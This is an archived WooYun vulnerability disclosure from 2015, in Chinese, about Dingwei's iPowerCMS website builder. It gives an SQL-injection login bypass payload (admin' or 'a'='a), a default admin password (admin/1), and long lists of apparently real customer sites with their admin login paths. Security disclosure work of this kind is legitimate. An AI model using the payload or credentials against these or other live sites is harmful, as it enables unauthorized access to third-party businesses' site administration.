当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110152

漏洞标题:某企业建站CMS存在多项漏洞打包 影响大量客户网站安全

相关厂商:重庆鼎维网络科技有限公司

漏洞作者: Ch丶0nly

提交时间:2015-04-28 17:50

修复时间:2015-06-12 17:52

公开时间:2015-06-12 17:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某企业建站CMS存在多项漏洞打包 影响大量客户网站安全

详细说明:

重庆鼎维网络科技有限公司作为一家专业的互联网信息技术服务提供商,不仅专注于企业互联网信息平台的建设,而且致力于为客户提供专业、 量身订制的企业管理软件和解决方案。并充分把握中小型企业信息化管理的个性化需求.

漏洞证明:

官网:http://www.dingwei.cn
鼎维iPowerCMS建站CMS存在两处高危漏洞:建站弱口令、万能密码

测试的时候建议使用IE浏览器 (可能会不兼容)


万能密码 admin' or 'a'='a
http://www.cqtianye.com/m/
账号admin' or 'a'='a 密码随便填写

1.jpg


1.jpg


http://www.cqnbshw.com/m/

1.jpg


附部分案例:
http://www.cqtianye.com/m/
http://www.cqnbshw.com/m/
http://www.cqjylds.com/m/
http://www.ruierjia.com/m/
http://www.cqukja.com/m/
http://www.cqhualai.com/m/
http://www.minghan-co.com/m/
http://www.cqhfyt.com/m/
http://www.huoguogroup.com/m/
http://www.xtdoor.com/m/
http://www.minghanindustry.com/m/
http://www.cqgmdq.com/m/
http://www.cqpea.cn/m/
http://www.cqsage.com/m/
http://www.cqatec.com/m/
http://www.cqdapu.com/m/
http://www.cccc-3.com/m/
http://www.neithre.net/m/
http://www.cqhqkj.cn/m/
http://www.beidoufucheng.com/m/


漏洞2#
2. 第二处漏洞是 建站弱口令
http://www.cqtianye.com/m/
通用账号admin 密码1

1.jpg


成功登陆后台

1.jpg


附部分案例:
http://www.cqtianye.com/m/
http://www.srxwy.com/m/
http://www.mrtgj.com/m/
http://www.chcmu.com/m/
http://demo.deepinfo.cn/ksk/m/
http://www.cqnbshw.com/m/
http://www.cqjylds.com/m/
http://www.minghan-co.com/m/
http://www.cqhfyt.com/m/
http://www.cqjgy.net/m/
http://www.chinassp.net/m/
http://www.cqwshg.cn/m/
http://www.htmjx.com/m/
http://yuliandb.com/m/
http://www.cqsyjt.cn/m/
http://www.lxzydj.com/m/
http://www.hupooil.com/m/
http://www.mxz.cn/m/
http://www.cqbfc.com/m/
http://www.cqgzc.cn/m/
http://www.yashileasing.com/m/
http://www.juboo.com.cn/m/


审核哥哥辛苦了! O(∩_∩)O~

修复方案:

修复

版权声明:转载请注明来源 Ch丶0nly@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝